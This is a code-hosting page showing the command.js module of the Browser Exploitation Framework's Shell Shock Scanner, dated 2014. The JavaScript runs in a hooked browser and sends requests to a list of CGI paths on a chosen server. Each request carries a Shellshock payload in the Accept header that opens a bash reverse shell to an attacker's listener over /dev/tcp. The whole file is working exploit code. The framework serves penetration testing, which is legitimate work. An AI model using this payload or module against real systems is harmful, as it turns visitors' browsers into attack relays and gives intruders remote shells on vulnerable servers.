Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
cc0993a2eb54ae865f5f41c2381cb981fedacff1
beef/modules/exploits/shell_shock_scanner/command.js
Brendan Coles cc0993a2eb Add Shell Shock Scanner module
2014-10-30 00:09:18 +00:00

76 lines
2.1 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rproto = '<%= @rproto %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
var target = rproto + '://' + rhost + ':' + rport;
var method = '<%= @method %>';
var wait = '<%= @wait %>';
var timeout = '<%= @timeout %>';
get_cgi = function(uri) {
try {
var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
var xhr = new XMLHttpRequest();
xhr.open(method, target+uri, true);
xhr.onload = function () {
};
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200) {
beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
}
}
xhr.setRequestHeader("Accept", payload);
xhr.send(null);
} catch (e){
beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
}
}
var scripts = new Array(
<%=
scripts = []
File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
file_handle.each_line do |line|
uri = line.chomp!
next if uri =~ /^#/
next if uri.nil?
scripts << "'#{uri}'"
end
end
scripts.shuffle.join(",\n")
%>
);
// add scripts to queue
var requests = [];
for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
// process queue
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
var handle = setInterval(function() {
if (requests.length > 0) {
get_cgi(requests.pop());
} else cleanup();
}, wait*1000);
// clean up
cleanup = function() {
if (handle) {
beef.debug("Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
}
}
setTimeout("cleanup();", timeout*1000);
});
Reference in New Issue View Git Blame Copy Permalink